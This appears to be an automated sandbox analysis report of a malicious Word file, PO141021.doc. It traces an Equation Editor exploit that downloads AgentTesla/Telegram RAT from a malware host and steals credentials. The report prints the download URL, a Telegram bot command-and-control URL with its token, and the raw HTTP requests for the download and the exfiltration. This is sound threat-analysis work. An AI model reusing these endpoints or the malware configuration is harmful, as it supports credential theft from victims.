Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO141021.doc

Overview

General Information

Sample Name:PO141021.doc
Analysis ID:502705
MD5:9095b4b704c9f1ef75cc683b57e1f207
SHA1:d88b99fc3fff5eac59d7fedd136fd467f1c17106
SHA256:10df15707ce5a8b457ebccab5f4a5c3b2548ea755bc11666f5601583677f17b5
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Office equation editor drops PE file
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2252 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • godsawqop.exe (PID: 2692 cmdline: C:\Users\user\AppData\Roaming\godsawqop.exe MD5: D1BAA9515F4C67A7B561938BBD81BC75)
      • godsawqop.exe (PID: 2236 cmdline: C:\Users\user\AppData\Roaming\godsawqop.exe MD5: D1BAA9515F4C67A7B561938BBD81BC75)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1991797369", "Chat URL": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.godsawqop.exe.32ea110.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.godsawqop.exe.32ea110.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.godsawqop.exe.3320330.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.godsawqop.exe.3320330.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.godsawqop.exe.3320330.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 95.216.94.72, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1500, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1500, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\godsawqop.exe, CommandLine: C:\Users\user\AppData\Roaming\godsawqop.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\godsawqop.exe, NewProcessName: C:\Users\user\AppData\Roaming\godsawqop.exe, OriginalFileName: C:\Users\user\AppData\Roaming\godsawqop.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1500, ProcessCommandLine: C:\Users\user\AppData\Roaming\godsawqop.exe, ProcessId: 2692

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.2.godsawqop.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1991797369", "Chat URL": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument"}
                      Source: godsawqop.exe.2692.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PO141021.docVirustotal: Detection: 39%Perma Link
                      Antivirus detection for URL or domainShow sources
                      Source: http://milkhost.ru/trasper/goshcj.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: milkhost.ruVirustotal: Detection: 7%Perma Link
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: global trafficDNS query: name: milkhost.ru
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 95.216.94.72:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: global trafficHTTP traffic detected: POST /bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f2463ef5aa5Host: api.telegram.orgContent-Length: 1023Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Oct 2021 08:34:58 GMTContent-Type: application/x-msdownloadContent-Length: 486912Connection: keep-aliveLast-Modified: Thu, 14 Oct 2021 01:52:01 GMTExpires: Mon, 13 Dec 2021 08:34:58 GMTCache-Control: max-age=5184000Pragma: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 8c 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 c9 1f 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 73 07 00 57 00 00 00 00 80 07 00 d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 a4 06 00 00 cf 00 00 02 00 00 00 5c 00 00 06 04 42 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 09 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 06 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 09 01 00 06 72 4b 48 00 70 7e 3d 00 00 04 02 28 09 01 00 06 28 11 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 fe 00 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 09 01 00 06 7
                      Source: global trafficHTTP traffic detected: GET /trasper/goshcj.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milkhost.ruConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: godsawqop.exe, 00000005.00000002.724989043.0000000002633000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: godsawqop.exe, 00000005.00000002.725093065.000000000499B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://mZWVLr.com
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: godsawqop.exe, 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmpString found in binary or memory: https://4hCltxiPdhpdC.com
                      Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/
                      Source: godsawqop.exe, 00000005.00000002.724184931.000000000064E000.00000004.00000020.sdmp, godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument
                      Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocumentdocument-----
                      Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgP
                      Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f2463ef5aa5Host: api.telegram.orgContent-Length: 1023Expect: 100-continueConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0008E59B-A89A-4382-AC7E-24705A8EB889}.tmpJump to behavior
                      Source: unknownDNS traffic detected: queries for: milkhost.ru
                      Source: global trafficHTTP traffic detected: GET /trasper/goshcj.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milkhost.ruConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\godsawqop.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_002D3687
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_002D8EF0
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00481010
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_004F0048
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_004F5680
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00505A40
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00500048
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_005173BF
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00510048
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_006A0048
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_008072B7
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00801BCD
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_0080B81F
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002D6048
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002D5430
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002DF510
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002D5778
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002D2197
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_002DECC0
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_0086E888
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00864618
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00867828
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_0086AF68
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_008618AC
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_008618B8
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00866A10
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_0086B538
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00485FF0 CreateProcessAsUserW,
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_004F0048 ShipAssert,NtOpenResourceManager,
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory allocated: 76E90000 page execute and read and write
                      Source: PO141021.docVirustotal: Detection: 39%
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$141021.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD049.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/9@2/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: goshcj[1].exe.2.dr, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
                      Source: godsawqop.exe.2.dr, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
                      Source: 4.2.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
                      Source: 4.0.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
